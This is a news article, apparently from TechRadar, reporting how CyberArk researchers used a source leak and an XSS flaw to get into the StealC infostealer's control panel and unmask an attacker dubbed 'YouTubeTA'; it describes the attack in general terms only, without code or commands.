- CyberArk exploited StealC control panel via source leak and XSS flaw
- Researchers have exposed the “YouTubeTA” attacker, who stole 390,000 passwords and 30 million cookies.
- The findings could disrupt StealC’s operations by sparking further scrutiny and attacks.
Cybersecurity researchers managed to penetrate the web control panel of information stealer StealC and obtain valuable information about how the malware works, as well as the identities of the attackers and victims.
StealC is an extremely popular infostealer malware that first appeared a few years ago and has since become a staple in the cybercriminal community.
It can collect and exfiltrate sensitive data such as web browser credentials, cookies, system information, messaging applications and email data, as well as cryptocurrency wallet details, and it offers different features such as modular targeting, stealth execution and flexible command and control communications.
Victims of doxxing
CyberArk security researchers found two ways to access the control panel: through a source code leak that occurred around April 2025 and a discovered cross-site scripting (XSS) vulnerability.
“By exploiting this vulnerability, we were able to identify characteristics of threat actors’ computers, including general location indicators and details about computer hardware,” the researchers said. “In addition, we were able to retrieve active session cookies, which allowed us to take control of sessions from our own machines.”
The report details a malicious actor, dubbed “YouTubeTA,” who used stolen credentials to log into legitimate YouTube channels and link to the malware. The campaign brought YouTubeTA more than 5,000 victim logs, 390,000 passwords and 30 million cookies.
CyberArk discovered that the attacker was using an Apple M3-based device, with English and Russian language settings. The time zone was Eastern European, and on at least one occasion they connected from Ukraine. Usually, cybercriminals only connect through a VPN to cover their tracks, but this malicious actor forgot to do so once, revealing his IP address, which is linked to Ukrainian ISP TRK Cable TV.
By releasing this news, CyberArk hopes that StealC will also be targeted by other actors, both harmless and malicious, thereby disrupting the entire operation.
Via BeepComputer
The best antivirus for every budget
Follow TechRadar on Google News And add us as your favorite source to get our news, reviews and expert opinions in your feeds. Make sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp Also.
